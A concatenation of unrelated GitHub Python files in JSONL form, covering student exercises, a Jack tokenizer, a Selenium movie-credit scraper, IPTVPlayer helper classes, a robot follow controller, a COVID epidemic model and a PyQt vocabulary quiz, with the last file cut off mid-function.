+{"seq_id":"20698408705","text":"# def counter(string): #сложность О(n ** 2)\n# for symvol in string:\n# counter = 0\n# for sub_symvol in string:\n# if symvol == sub_symvol:\n# counter += 1\n# print(symvol, counter)\n\n# counter('')\n\n\n# def counter(string): #сложность О(n * m)\n# for symvol in set(string):\n# counter = 0\n# for sub_symvol in string:\n# if symvol == sub_symvol:\n# counter += 1\n# print(symvol, counter)\n\n# counter('312424')\n\ndef counter(string):\n syms_counter = {}\n for symvol in string:\n syms_counter[symvol] = syms_counter.get(symvol, 0) + 1\n print(syms_counter)\n\ncounter('azazazxasa')","repo_name":"NinjigSV/programming_4_modul","sub_path":"lesson_1.py","file_name":"lesson_1.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"3188614972","text":"import json\nimport datetime as DT\nimport matplotlib.pyplot as plt\nimport ytbscrapper\n\nchannel_id = 'UCgtAOyEQdAyjvm9ATCi_Aig'\n\nvideo_path, info_path = ytbscrapper.get_info(channel_id)\n\nwith open(info_path, 'r') as file:\n info = json.load(file)\n\ndeltas = []\nviews = []\nnow = DT.datetime.now()\n\nfor index, key in enumerate(info):\n date = DT.datetime.strptime(info[key]['date'], \"%Y-%m-%dT%H:%M:%SZ\")\n delta = now - date\n additive = delta.seconds / 3600 / 24\n days = delta.days + int(additive + (0.5 if additive > 0 else -0.5))\n view = info[key]['view']\n deltas.append(days)\n views.append(view)\n\nplt.plot(deltas, views, color='red')\nplt.show()\n","repo_name":"Maxersh/WebScrappingYoutube","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"4211495547","text":"import base64\n\nfrom fastapi import APIRouter, Depends, HTTPException\nfrom pydantic import BaseModel\nfrom controller.inference import Inference\n\n\nrouter = APIRouter(\n prefix=\"/flowers\",\n responses={404: {\"description\": \"Not found\"}},\n)\n\n\ninferrer = Inference.load_dense_net('resources/plants_classification_cnn_dense_100_epochs.pt',\n 'resources/cat_to_name.json'\n )\n\n\nclass Item(BaseModel):\n image: str\n\n\n@router.post(\"/classify/\")\nasync def classify_item(item: Item):\n try:\n pred, score = inferrer.classify(base64.b64decode(item.image))\n return {\n \"classification\": pred,\n \"confidence\": score\n }\n except ValueError:\n raise HTTPException(\n status_code=422, detail=\"Invalid Format\"\n )\n","repo_name":"afakhry01/flowers-identification","sub_path":"app/server/main/router/flowers.py","file_name":"flowers.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"15483991584","text":"import re\n\nSymbols = \"{|}|\\(|\\)|\\[|\\]|\\.|,|;|\\+|-|\\*|/|&|\\||<|>|=|~\"\n\nKeywords = ['class', 'method', 'function', 'constructor', \n 'int', 'boolean', 'char', 'void', \n 'var', 'static', 'field', 'let', \n 'do', 'if', 'else', 'while', \n 'return', 'true', 'false', 'null', \n 'this']\n\nToken_type = { \n 'KEYWORD' : 0,\n 'SYMBOL' : 1, \n 'IDENTIFIER' : 2, \n 'INT_CONST' : 3, \n 'STRING_CONST' : 4\n }\n\nSymbol_List = ['{', \"}\", '(', ')', \n '[', ']', '.', ',', ';',\n '+', '-', '/', '&', '|', \n '<', '>', '=', '~'\n ]\n\nop = ['+', '-', '*', '/', '&', \n '|', '<', '>', '=' ]\n\nclass JackTokenizer(object):\n '''\n Tokenizer that releases tokens to be compiled by the Compilation Engine\n '''\n \n def __init__(self, file_name):\n '''\n Constructor\n '''\n self._file_name = file_name\n self._file_object = open(file_name)\n self._lines = []\n self._tokens = []\n self._current_token = None\n self._current_token_index = 0\n self._len_tokens = 0\n\n def split(self, line):\n '''\n Splits input code by space and symbols. Returns a list.\n '''\n tokens = []\n space_septd = line.split() #Split on space\n for s_token in space_septd:\n tokens += re.split('(' + Symbols + ')', s_token) #Split on Jack Symbols\n return [s for s in tokens if s != '']\n \n def removeNoise(self):\n '''\n Removes white space and comments\n '''\n comment = False\n for line in self._file_object.readlines():\n line = line.strip()\n if len(line) == 0:\n continue \n elif line[0:3] == '/**' or line[0:2] == '/*': #Multiline comments\n comment = True\n continue\n elif line[0] == '*':\n continue\n elif line[0] == '*' and line[-2:] == '*/' and comment == True:\n comment = False\n continue\n elif line[-2:] == '*/' and comment == True:\n comment = False\n continue\n elif line.find('//') != -1: #Single line comments\n if len(line[:line.find('//')]) == 0:\n continue\n self._lines.append(line[:line.find('//')])\n else:\n self._lines.append(line)\n \n \n def print_tokens(self):\n '''\n Useful if we want to view the tokens.\n '''\n for idx in range(self._len_tokens):\n print (self._tokens[idx])\n \n def prepare_tokens(self):\n '''\n Prepares tokens for compilation engine. Takes care to tokens which should be treated\n as a String Constant.\n '''\n for line in self._lines:\n x = line.split('\"')\n if len(x) ==1:\n self._tokens += self.split(x[0]) # No String Constant Present\n else:\n for i in range(len(x)):\n if i%2==0:\n self._tokens += self.split(x[i])\n else:\n self._tokens = self._tokens + ['\"' + x[i] + '\"']\n \n self._len_tokens = len(self._tokens)\n return self._tokens\n \n def next_token(self,prev = False):\n '''\n Get the next token. prev is set when unary operators are used. \n '''\n if prev:\n self._current_token_index-=2 # Go back a token. (Based on my logic in CompilationEngine)\n if self._current_token_index < self._len_tokens:\n token = self._tokens[self._current_token_index]\n self._current_token = token\n self._current_token_index += 1\n return token\n else:\n return 'NO_MORE_TOKENS'\n \n def expected_token(self):\n \"\"\"\n Needed for subroutines and arrays when we want to look ahead.\n \"\"\"\n if self._current_token_index < self._len_tokens:\n return self._tokens[self._current_token_index]\n else:\n return 'NO_MORE_TOKENS'\n \n def token_type(self):\n '''\n Returns the type of token.\n '''\n if self._current_token in Symbol_List:\n return 'SYMBOL'\n elif self._current_token in Keywords:\n return 'KEYWORD'\n elif self._current_token.isdigit():\n return 'INT_CONST'\n elif self._current_token.find('\"') != -1 or self._current_token[0] == '-':\n return 'STRING_CONST'\n else:\n return 'IDENTIFIER'\n \n def identifier(self):\n return self._current_token\n \n def symbols(self):\n return self._current_token\n \n def intval(self):\n return self._current_token\n \n def stringval(self):\n return self._current_token\n \n def keyword(self):\n return self._current_token","repo_name":"KiranBaktha/Nand2Tetris","sub_path":"Nand2Tetris-master/Project 10/JackTokenizer.py","file_name":"JackTokenizer.py","file_ext":"py","file_size_in_byte":5060,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"35413550676","text":"from collections import deque\n\n\nt = int(input())\nfor i in range(t):\n p_list = input()\n len_p = len(p_list)\n n = int(input()) # len_n\n LIST = input()[1:-1].split(',')\n n_list = deque(x\n for x in LIST) if n != 0 else deque()\n i = 0\n start = 0\n while i < len_p:\n if p_list[i] == 'R':\n if start == 0:\n start = 1\n else:\n start = 0\n elif p_list[i] == 'D':\n if n == 0:\n print(\"error\")\n break\n if start == 0:\n n_list.popleft()\n else:\n n_list.pop()\n n -= 1\n i += 1\n else:\n if start == 1:\n n_list.reverse()\n print(\"[\", end='')\n print(\",\".join(n_list), end='')\n print(\"]\")\n","repo_name":"nimod7890/Problem-Solving","sub_path":"Gold/Gold 5/5430 AC.py","file_name":"5430 AC.py","file_ext":"py","file_size_in_byte":824,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"28702826434","text":"# 양방향 연결 리스트 노드 삽입 (insertBefore() 구현)\nclass Node:\n\n def __init__(self, item):\n self.data = item\n self.prev = None\n self.next = None\n\n\nclass DoublyLinkedList:\n\n def __init__(self):\n self.nodeCount = 0\n self.head = Node(None)\n self.tail = Node(None)\n self.head.prev = None\n self.head.next = self.tail\n self.tail.prev = self.head\n self.tail.next = None\n\n\n def traverse(self):\n result = []\n curr = self.head\n while curr.next.next:\n curr = curr.next\n result.append(curr.data)\n return result\n\n\n def insertBefore(self, next, newNode):\n prev = next.prev\n prev.next = newNode\n next.prev = newNode\n newNode.prev = prev\n newNode.next = next\n self.nodeCount += 1\n return True\n\n\ndef solution(x):\n return 0\n","repo_name":"hanna56/Algorithm-lecture","sub_path":"lab10-2.py","file_name":"lab10-2.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"22574737506","text":"from selenium.webdriver.common.by import By\n\ndef crawl_movie_person(conn, cur, url, driver):\n \"\"\"한 영화에 대하여 '상세정보'에 들어가서 인물정보를 저장한다\"\"\"\n \n m_id = int(url.split('=')[-1])\n print(f'mid : {m_id}')\n driver.get(f'https://movie.naver.com/movie/bi/mi/detail.naver?code={m_id}')\n \n #더보기 버튼 활성화\n try:\n driver.find_element(By.ID, 'actorMore').click() \n except:\n pass\n\n \"\"\"\n 배우\n \"\"\"\n person_list = driver.find_elements(By.CLASS_NAME, 'p_info')\n sql_list = []\n for person in person_list:\n try:\n p_id = person.find_element(By.XPATH, 'a').get_attribute('href').split('code=')[1] \n except:\n p_id = -1 #pid 없는 경우\n try:\n # 주연 / 조연 등\n role = person.find_element(By.CLASS_NAME, 'p_part').text\n except:\n role = ''\n try:\n # ~~ 역\n character = person.find_element(By.CLASS_NAME, 'pe_cmt').find_element(By.XPATH,'span').text.replace('역','').strip()\n except:\n character =''\n sql_list.append((m_id, p_id, role, character))\n # print(f'mid:{m_id}\\npid:{p_id}\\nrole:{role}\\ncharacter:{character}\\n===========================')\n\n \"\"\"\n 단역 및 특별출연\n \"\"\"\n try:\n person_span_list_row = driver.find_element(By.ID, 'subActorList').find_elements(By.XPATH,'tbody/tr')\n except:\n person_span_list_row = []\n \n for row in person_span_list_row:\n try: \n role = row.find_element(By.XPATH,'th/img').get_attribute('alt') #단역, 특별출연 등\n except:\n role = ''\n person_list = row.find_elements(By.XPATH,'td/span')\n for person in person_list:\n try:\n p_id = person.find_element(By.XPATH,'a').get_attribute('href').split('code=')[1]\n except:\n p_id = -1\n try:\n character = person.find_element(By.XPATH,'em').text\n except:\n character = ''\n sql_list.append((m_id, p_id, role, character))\n # print(f'mid:{m_id}\\npid:{p_id}\\nrole:{role}\\ncharacter:{character}\\n===========================')\n \"\"\"\n 감독 \n \"\"\"\n try:\n director_list = driver.find_elements(By.CLASS_NAME,'dir_product')\n except:\n director_list = []\n for director in director_list:\n try:\n p_id = director.find_element(By.XPATH, 'a').get_attribute('href').split('code=')[1]\n except:\n p_id =-1\n role = '감독'\n character = ''\n sql_list.append((m_id, p_id, role, character))\n # print(f'mid:{m_id}\\npid:{p_id}\\nrole:{role}\\ncharacter:{character}\\n===========================')\n\n insert_sql = \"\"\"\n insert ignore into movie_person(m_id, p_id, role, character_)\n values(%s,%s,%s,%s); \"\"\"\n cur.executemany(insert_sql, sql_list)\n conn.commit()\n\n\n ","repo_name":"choieastsea/ds_naver_movie","sub_path":"crawl_movie_person.py","file_name":"crawl_movie_person.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"9000249612","text":"# -*- coding: utf-8 -*-\n\n###################################################\n# LOCAL import\n###################################################\nfrom Plugins.Extensions.IPTVPlayer.dToolsSet.iptvtools import printDBG, printExc, DownloadFile, eConnectCallback\n###################################################\n# FOREIGN import\n###################################################\nfrom enigma import eConsoleAppContainer\nfrom Tools.Directories import resolveFilename, fileExists, SCOPE_PLUGINS\nfrom Components.config import config, configfile\nfrom Components.Language import language\nimport gettext\nimport os, sys\nimport threading\nimport time\n###################################################\n\n###################################################\n# Globals\n###################################################\ngInitIPTVPlayer = True # is initialization of IPTVPlayer is needed\nPluginLanguageDomain = \"IPTVPlayer\"\nPluginLanguagePath = \"Extensions/IPTVPlayer/locale\"\ngSetIPTVPlayerLastHostError = \"\"\ngIPTVPlayerNotificationList = None\n\n###################################################\ndef localeInit():\n lang = language.getLanguage()[:2] # getLanguage returns e.g. \"fi_FI\" for \"language_country\"\n os.environ[\"LANGUAGE\"] = lang # Enigma doesn't set this (or LC_ALL, LC_MESSAGES, LANG). gettext needs it!\n printDBG(PluginLanguageDomain + \" set language to \" + lang)\n gettext.bindtextdomain(PluginLanguageDomain, resolveFilename(SCOPE_PLUGINS, PluginLanguagePath))\n\ndef TranslateTXT(txt):\n t = gettext.dgettext(PluginLanguageDomain, txt)\n if t == txt:\n t = gettext.gettext(txt)\n return t\n\nlocaleInit()\nlanguage.addCallback(localeInit)\n\ndef IPTVPlayerNeedInit(value=None):\n global gInitIPTVPlayer\n if value in [True, False]: gInitIPTVPlayer = value\n return gInitIPTVPlayer\n \ndef SetIPTVPlayerLastHostError(value=\"\"):\n global gSetIPTVPlayerLastHostError\n gSetIPTVPlayerLastHostError = value\n\ndef GetIPTVPlayerLastHostError(clear=True):\n global gSetIPTVPlayerLastHostError\n tmp = gSetIPTVPlayerLastHostError\n if clear: gSetIPTVPlayerLastHostError = \"\"\n return tmp\n\nclass IPTVPlayerNotification():\n def __init__(self, title, message, type, timeout):\n self.title = str(title)\n self.message = str(message)\n self.type = str(type) # \"info\", \"error\", \"warning\"\n self.timeout = int(timeout)\n \n def __eq__(self, a):\n return not self.__ne__(a)\n \n def __ne__(self, a):\n if self.title != a.title or \\\n self.type != a.type or \\\n self.message != a.message or \\\n self.timeout != a.timeout:\n return True\n return False\n\nclass IPTVPlayerNotificationList(object):\n \n def __init__(self):\n self.notificationsList = []\n self.mainLock = threading.Lock()\n # this flag will be checked with mutex taken \n # to less lock check\n self.empty = True\n \n def clearQueue(self):\n with self.mainLock:\n self.notificationsList = []\n self.empty = True\n \n def isEmpty(self):\n try:\n if self.empty:\n return True\n except Exception:\n pass\n return False\n \n def push(self, message, type=\"message\", timeout=5): #, allowDuplicates=True\n ret = False\n with self.mainLock:\n try:\n notification = IPTVPlayerNotification('IPTVPlayer', message, type, timeout)\n self.notificationsList.append(notification)\n self.empty = False\n ret = True\n except Exception:\n print(str(e))\n return ret\n\n def pop(self, popAllSameNotificationsAtOnce=True):\n notification = None\n with self.mainLock:\n try:\n notification = self.notificationsList.pop()\n if popAllSameNotificationsAtOnce:\n newList = []\n for item in self.notificationsList:\n if item != notification:\n newList.append(item)\n self.notificationsList = newList\n except Exception as e:\n print(str(e))\n \n if 0 == len(self.notificationsList):\n self.empty = True\n return notification\n\ngIPTVPlayerNotificationList = IPTVPlayerNotificationList()\ndef GetIPTVNotify():\n global gIPTVPlayerNotificationList\n return gIPTVPlayerNotificationList\n \nclass IPTVPlayerSleep(object):\n \n def __init__(self):\n self.mainLock = threading.Lock()\n self.timeout = 0\n self.startTimestamp = 0\n \n def Sleep(self, timeout, blocking=True):\n tmp = float(timeout)\n with self.mainLock:\n self.timeout = timeout\n self.startTimestamp = time.time()\n if blocking: time.sleep(self.timeout)\n \n def Reset(self):\n with self.mainLock:\n self.startTimestamp = 0\n \n def getTimeout(self):\n ret = 0\n with self.mainLock:\n if self.timeout != 0:\n ret = int(self.timeout - (time.time() - self.startTimestamp))\n if ret <= 0:\n self.timeout = 0\n ret = 0\n return ret\n \ngIPTVPlayerSleep = IPTVPlayerSleep()\ndef GetIPTVSleep():\n global gIPTVPlayerSleep\n return gIPTVPlayerSleep\n \n \n","repo_name":"j00zek/crossplatform_iptvplayer","sub_path":"IPTVplayer/icomponents/iptvplayerinit.py","file_name":"iptvplayerinit.py","file_ext":"py","file_size_in_byte":5422,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"22106386826","text":"from utils.repo import Repository\nimport sqlite3\nfrom sqlite3 import Error\nfrom domain.Assignment import Assignment\nimport time\nimport datetime\n\n\nclass AssignmentSqlRepo(Repository):\n def __init__(self, database, table):\n super().__init__()\n self._database = database\n self._connection = self.create_connection()\n self._loadDatabase()\n\n def create_connection(self):\n conn = None\n try:\n conn = sqlite3.connect(self._database)\n except Error as e:\n raise e\n return conn\n\n def _loadDatabase(self):\n current = self._connection.cursor()\n current.execute('SELECT * FROM assignments')\n rows = current.fetchall()\n for row in rows:\n timp = datetime.datetime.fromtimestamp(row[2])\n self._objects.append(Assignment(row[0], row[1], timp))\n\n def store(self, obj):\n Repository.store(self, obj)\n obj = (obj.Id, obj.Description, time.mktime(obj.Deadline.timetuple()))\n sql = '''INSERT INTO assignments (id, description, deadline) VALUES (?, ?, ?)'''\n current = self._connection.cursor()\n current.execute(sql, obj)\n self._connection.commit()\n\n def update(self, obj):\n Repository.update(self, obj)\n obj = (obj.Description, time.mktime(obj.Deadline.timetuple()), obj.Id)\n sql = '''UPDATE assignments\n SET description = ? ,\n deadline = ? \n WHERE id = ?'''\n current = self._conn.cursor()\n current.execute(sql, obj)\n self._connection.commit()\n\n def delete(self, objID):\n Repository.delete(self, objID)\n sql = 'DELETE FROM assignments WHERE id = ?'\n current = self._connection.cursor()\n current.execute(sql, (objID,))\n self._connection.commit()\n","repo_name":"Taveeh/Fundamentals-of-Programming","sub_path":"Assignment 6 - 9/DatabaseRepos/AssignmentDatabaseRepo.py","file_name":"AssignmentDatabaseRepo.py","file_ext":"py","file_size_in_byte":1859,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"70"}
+{"seq_id":"9175581035","text":"from src.stanford_lib.Controller import Controller\nfrom src.stanford_lib.State import BehaviorState\nimport numpy as np\n\nclass FollowController(Controller):\n def __init__(self, config, inverse_kinematics):\n super().__init__(config, inverse_kinematics)\n\n self.in_follow_state = False\n self.following = False\n self.rx_ = 0.0\n self.ry_ = 0.0\n self.lx_ = 0.0\n self.ly_ = 0.0\n\n self.l_alpha = 0.15\n self.r_alpha = 0.1\n \n self.eps = 0.5\n self.slow_down_distance = 1.0\n \n # probably from config file to get cam_skip_frames, distance \n self.camera_module = Camera_serial(cam_skip_frames=100, distance=100)\n\n \n def run(self, state, command):\n if command.follow_event:\n if self.in_follow_state == False:\n self.in_follow_state = True\n command.stand_event = True\n super().run(state, command)\n print(\"t pressed, in_follow_state entered\")\n else: \n self.in_follow_state = False\n super().run(state, command)\n print(\"t pressed, in_follow_state exited\")\n elif self.in_follow_state:\n\n if command.start_stop_following_event and self.following == False:\n self.following = True\n self.count = 0\n print(\"u pressed, following started\")\n elif command.start_stop_following_event and self.following == True:\n command.stand_event = True\n self.following = False\n super().run(state, command)\n print(\"u pressed, following exited\")\n\n if self.following:\n delta_yaw, depth = 0,0\n \n \n\n def depth_fn(d):\n # v1. slows down linearly between slow_down_distance and eps\n # if d > self.slow_down_distance:\n # return 1\n # elif d < self.slow_down_distance:\n # return (d-self.eps)/(self.slow_down_distance-self.eps)\n # else:\n # return 0\n # v2. stops at eps\n if d > self.eps:\n return 1\n else:\n return 0\n\n \n # self.lx_ = self.l_alpha * 0 + (1 - self.l_alpha) * self.lx_ # no straffing\n how_far = depth_fn(depth)\n \n self.ly_ = self.l_alpha * how_far + (1 - self.l_alpha) * self.ly_ # l_alpha*1 for forward. l_alpha*-1 for backward\n\n if how_far != 0: \n x_vel = self.ly_ * self.config.max_x_velocity\n y_vel = self.lx_ * -self.config.max_y_velocity\n command.horizontal_velocity = np.array([x_vel, y_vel])\n\n self.rx_ = self.r_alpha * delta_yaw + (1 - self.r_alpha) * self.rx_ #r_alpha*1 for right. r_alpha*-1 for left\n command.yaw_rate = self.rx_ * self.config.max_yaw_rate\n if state.behavior_state != BehaviorState.TROT:\n command.trot_event = True\n\n super().run(state, command)\n else:\n print(\"goal reached!\")\n command.stand_event = True\n super().run(state, command)\n \n \n else:\n super().run(state, command)\n","repo_name":"JaredDiCioccio/cs685_pupper_project","sub_path":"src/pupper_controller/src/stanford_lib/FollowController.py","file_name":"FollowController.py","file_ext":"py","file_size_in_byte":3542,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"16914213546","text":"import matplotlib.pyplot as plt\nimport SIRX\nimport numpy as np\nimport pickle, datetime\nimport fit_models\n\ns = fit_models.settings\ns[\"proj_date\"] = datetime.date( 2021, 3, 1 )#Sufficently far in the future for any peak\ndbase = fit_models.load_data( s )\n\nmx=0\nfig, (ax1, ax2) = plt.subplots(1, 2,figsize=(10,6.5))\nfor R0i,IFRi,ax in zip( [2.5,4.0],[1.25/100,0.7/100],[ax1,ax2]):\n\n s['R0'] = R0i\n s['IFR'] = IFRi\n data = fit_models.fit_model( dbase, s, do_plot=False)\n Q = data['Q']\n\n sirm = SIRX.SIRXConfirmedModel()\n\n\n days = np.arange(1,100)\n tt = np.logspace(np.log(days[0]), np.log(days[-1]), 1000,base=np.exp(1))\n\n eta = data['eta']\n rho = data['rho']\n kappa = data['kappa']\n kappa0 = data['kappa0']\n N = data['N']\n I0_factor = data['I0_factor']\n S0 = data['Sf']#Immune from current wave\n #S0 = 1.\n\n waves = [ 1., data['S0'], data['Sf'] ]\n results = []\n N0 = data['X0'] * N\n print(f\"N0={N0}\")\n\n for i,wave_i in enumerate(waves):\n result = sirm.SIRX( tt , N0, eta, rho, kappa, kappa0, N, I0_factor, wave_i)\n X = result[2,:]*N\n I = result[1,:]*N\n S = result[0,:]*N\n Z = result[3,:]*N\n results.append(result)\n\n ax.plot( tt, X/data['scaling_factor'], label=f\"$S_0$={wave_i:1.2f} (wave {i+1})\",lw=2 )\n mx = max( mx, np.max( X/data['scaling_factor']) )\n ax.set_title(f\"$R_0$={R0i:1.2f}, $IFR$={IFRi*100:1.2f}%, $Q$={Q:1.2f}, $X_{{a,0}}$={int(N0):,}\",fontsize=15)\n ax.set_xlabel(\"Day\", fontsize=16)\n ax.set_ylabel('$H_a$', fontsize=16)\n #ax.set_yscale('log')\n ax.legend(frameon=False, fontsize=13,loc=2)\n\nax1.set_ylim( 0, 1.2*mx)\nax2.set_ylim( 0, 1.2*mx)\n\nplt.tight_layout()\nplt.savefig(\"simulated_third_wave_comparison.png\",dpi=300)\n\n\n","repo_name":"smeetsbart/covid-hospitalization-belgium","sub_path":"wave2/new_wave.py","file_name":"new_wave.py","file_ext":"py","file_size_in_byte":1722,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"70"}
+{"seq_id":"42719133373","text":"import praw\nimport save_image\nimport requests\nimport os\n\nearthpornURL = \"https://www.reddit.com/r/earthporn.json\"\n\nsecret = \"fDLs_DEOnKeYCKP5n3jJ_n5b474\"\nid = \"sDHrovagvROA8w\"\nredirect = \"http://webxstudio.in\"\n\nclient_auth = requests.auth.HTTPBasicAuth( id , secret )\n\nuserAgent = \"WallpaperBot by ganesh\"\n\nreddit = praw.Reddit(client_id = id, client_secret = secret, user_agent = userAgent)\n\n\ndef setWall(completename):\n os.system(\"/usr/bin/gsettings set org.gnome.desktop.background picture-uri \"+completename)\n\nfor listing in reddit.subreddit('earthporn').new(limit=1):\n\tcompletename = save_image.saveImage(listing.url)\n\tsetWall(completename)\n","repo_name":"gat786/POTD","sub_path":"reddit.py","file_name":"reddit.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"70"}
+{"seq_id":"37952143863","text":"import sys\r\nimport json\r\nimport random\r\nfrom PyQt5 import QtWidgets\r\nfrom PyQt5.QtWidgets import QInputDialog, QFileDialog, QMainWindow, QApplication, QButtonGroup\r\nfrom main_design_code import Ui_MainWindow\r\n\r\nclass main(QMainWindow):\r\n def __init__(self):\r\n super(main, self).__init__()\r\n self.ui = Ui_MainWindow()\r\n self.ui.setupUi(self)\r\n self.true = 0\r\n self.false = 0\r\n self.setGeometry(550,130,880,840)\r\n self.ui.btnBrowse.clicked.connect(self.onClickedBrowse)\r\n self.ui.btnAsk.clicked.connect(self.onClickedOrientation)\r\n self.ui.btnCheck.clicked.connect(lambda : self.onClickedCheck(key,val))\r\n self.ui.btnFinish.clicked.connect(self.onClickedFinish)\r\n self.ui.btnAdd.clicked.connect(lambda : self.addWord(file_))\r\n self.ui.btnDelete.clicked.connect(lambda : self.deleteWord(file_))\r\n self.ui.btnSave.clicked.connect(lambda : self.saveFile(file_))\r\n self.ui.btnCreate.clicked.connect(self.createFile)\r\n self.ui.rbWordDefinition.pressed.connect(self.onClickedAsk)\r\n self.ui.rbDefinitionWord.pressed.connect(self.onClickedAsk2)\r\n\r\n self.group = QButtonGroup()\r\n self.group.addButton(self.ui.rbWordDefinition)\r\n self.group.addButton(self.ui.rbDefinitionWord) \r\n\r\n try:\r\n self.ui.wordInput.returnPressed.connect(lambda : self.onClickedCheck(key,val))\r\n self.ui.etAddDefinition.returnPressed.connect(lambda : self.addWord(file_))\r\n self.ui.etDeleteWord.returnPressed.connect(lambda : self.deleteWord(file_))\r\n self.ui.etFilneName.returnPressed.connect(lambda : self.saveFile(file_))\r\n except KeyError:\r\n pass\r\n\r\n def createFile(self):\r\n global file_\r\n file_ = {}\r\n global tempFile\r\n tempFile = {}\r\n self.ui.lblFileCreated.setText(\"Your file has been created. Before you can start the game, you must add a word below. You can save your file later if you wish.\")\r\n self.ui.btnAdd.setEnabled(True)\r\n if len(file_) > 0:\r\n self.ui.btnSave.setEnabled(True)\r\n self.ui.btnAsk.setEnabled(True)\r\n return file_\r\n\r\n def saveFile(self, file_):\r\n fileName = self.ui.etFilneName.text()\r\n try:\r\n with open(fileName, \"w\", encoding=\"utf-8\") as f:\r\n json.dump(file_, f)\r\n self.ui.lblFileSaved.setText(f\"File {fileName} has been saved.\")\r\n except FileNotFoundError:\r\n self.ui.lblFileSaved.setText(\"The filename cannot be a space. Please enter a usable name.\")\r\n return file_\r\n\r\n def deleteWord(self, file_):\r\n wordToDeleted = self.ui.etDeleteWord.text()\r\n try: \r\n file_.pop(wordToDeleted) \r\n self.ui.lblWordDeleted.setText(f\"{wordToDeleted} has been deleted.\")\r\n self.ui.etDeleteWord.setText(\"\")\r\n self.ui.btnSave.setEnabled(True)\r\n except KeyError:\r\n self.ui.lblWordDeleted.setText(f\"The word {wordToDeleted} doesn't already exist in your file.\")\r\n self.ui.etDeleteWord.setText(\"\")\r\n if len(file_) == 0:\r\n self.ui.btnSave.setEnabled(False)\r\n self.ui.btnAsk.setEnabled(False)\r\n self.ui.btnCheck.setEnabled(False)\r\n self.ui.btnFinish.setEnabled(False)\r\n self.ui.btnDelete.setEnabled(False)\r\n self.ui.rbWordDefinition.setEnabled(False)\r\n self.ui.rbDefinitionWord.setEnabled(False)\r\n return file_\r\n\r\n def addWord(self,file_):\r\n WordToAdd = self.ui.etAddWord.text()\r\n definitionToAdd = self.ui.etAddDefinition.text()\r\n if len(WordToAdd) == 0 or len(definitionToAdd) == 0:\r\n self.ui.lblWordAdded.setText(\"You cannot add a space. Please enter a word and its meaning.\")\r\n else:\r\n file_[WordToAdd] = definitionToAdd\r\n self.ui.lblWordAdded.setText(f\"{WordToAdd} has been added.\")\r\n self.ui.etAddWord.setText(\"\")\r\n self.ui.etAddDefinition.setText(\"\")\r\n self.ui.btnAsk.setEnabled(True)\r\n tempFile.update(file_)\r\n if len(file_) > 0:\r\n self.ui.btnDelete.setEnabled(True)\r\n self.ui.btnSave.setEnabled(True)\r\n self.ui.rbWordDefinition.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(True)\r\n return file_\r\n \r\n def onClickedFinish(self):\r\n self.ui.lblResult.setText(f\"{self.true} true, {self.false} false\")\r\n self.ui.btnCheck.setEnabled(False)\r\n self.ui.rbWordDefinition.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(True)\r\n\r\n def onClickedBrowse(self):\r\n filen = QFileDialog.getOpenFileName()\r\n path = filen[0]\r\n fileName2 = path.split(\"/\")\r\n global file_\r\n global tempFile\r\n tempFile = {}\r\n with open(path, encoding= \"utf-8\") as f:\r\n file_ = json.load(f)\r\n self.ui.lblBrowseRead.setText(f\"{fileName2[-1]} has been read.\")\r\n self.ui.etFilneName.setText(fileName2[-1])\r\n tempFile.update(file_)\r\n if len(file_) > 0:\r\n self.ui.btnDelete.setEnabled(True)\r\n self.ui.btnAsk.setEnabled(True)\r\n self.ui.btnAdd.setEnabled(True)\r\n self.ui.rbWordDefinition.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(True)\r\n self.ui.btnBrowse.setEnabled(False)\r\n self.ui.btnCreate.setEnabled(False)\r\n\r\n def onClickedOrientation(self):\r\n if self.ui.rbWordDefinition.isChecked():\r\n self.group.setExclusive(True) \r\n self.ui.btnAsk.clicked.connect(self.onClickedAsk)\r\n elif self.ui.rbDefinitionWord.isChecked():\r\n self.group.setExclusive(True) \r\n self.ui.btnAsk.clicked.connect(self.onClickedAsk2)\r\n\r\n def onClickedAsk(self):\r\n self.ui.wordInput.clear()\r\n global key,val\r\n key, val = random.choice(list(tempFile.items()))\r\n self.ui.lblAnswer.setText(\" \")\r\n self.ui.lblQuestionWord.setText(key)\r\n self.ui.btnCheck.setEnabled(True)\r\n self.ui.btnFinish.setEnabled(True)\r\n self.ui.rbDefinitionWord.setEnabled(False)\r\n return key, val\r\n \r\n def onClickedAsk2(self):\r\n self.ui.wordInput.clear()\r\n global key,val\r\n key, val = random.choice(list(tempFile.items()))\r\n self.ui.lblAnswer.setText(\" \")\r\n self.ui.lblQuestionWord.setText(val)\r\n self.ui.btnCheck.setEnabled(True)\r\n self.ui.btnFinish.setEnabled(True)\r\n self.ui.rbWordDefinition.setEnabled(False)\r\n return key, val\r\n\r\n def onClickedCheck(self,key,val):\r\n reply = self.ui.wordInput.text()\r\n self.ui.btnCheck.setEnabled(False)\r\n \r\n if self.ui.rbWordDefinition.isChecked():\r\n if reply == val:\r\n self.ui.lblAnswer.setText(\"Right\")\r\n self.true += 1\r\n try:\r\n tempFile.pop(key)\r\n except KeyError:\r\n pass\r\n 